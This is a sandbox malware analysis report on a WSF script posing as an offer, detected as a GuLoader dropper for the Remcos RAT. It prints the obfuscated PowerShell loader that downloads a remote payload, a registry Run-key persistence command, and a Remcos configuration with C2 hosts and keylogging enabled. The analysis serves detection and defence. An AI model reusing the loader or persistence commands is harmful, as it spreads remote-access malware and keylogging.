Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rOferta_SKGNMECLemnedefinitionen353523577.wsf

Overview

General Information

Sample name:rOferta_SKGNMECLemnedefinitionen353523577.wsf
Analysis ID:1429076
MD5:ed7122bfc1517425a483908cff86d950
SHA1:d71986894ac69f6958f3e126bec9eaabea50fa5c
SHA256:813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
Tags:wsf
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2532 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5532 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1492 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4340 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5776 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 3236 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mvourhjs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi32_1492.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xdd6b:$b2: ::FromBase64String(
              • 0xce2e:$s1: -join
              • 0x65da:$s4: +=
              • 0x669c:$s4: +=
              • 0xa8c3:$s4: +=
              • 0xc9e0:$s4: +=
              • 0xccca:$s4: +=
              • 0xce10:$s4: +=
              • 0x166bb:$s4: +=
              • 0x1673b:$s4: +=
              • 0x16801:$s4: +=
              • 0x16881:$s4: +=
              • 0x16a57:$s4: +=
              • 0x16adb:$s4: +=
              • 0xd607:$e4: Get-WmiObject
              • 0xd7f6:$e4: Get-Process
              • 0xd84e:$e4: Start-Process
              • 0x151dd:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5776, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 5268, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nyerhvervelsen
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5268, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 3236, ProcessName: reg.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5776, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 5268, ProcessName: cmd.exe
              Sigma detected: Suspicious Powershell In Registry Run Keys
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nyerhvervelsen
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
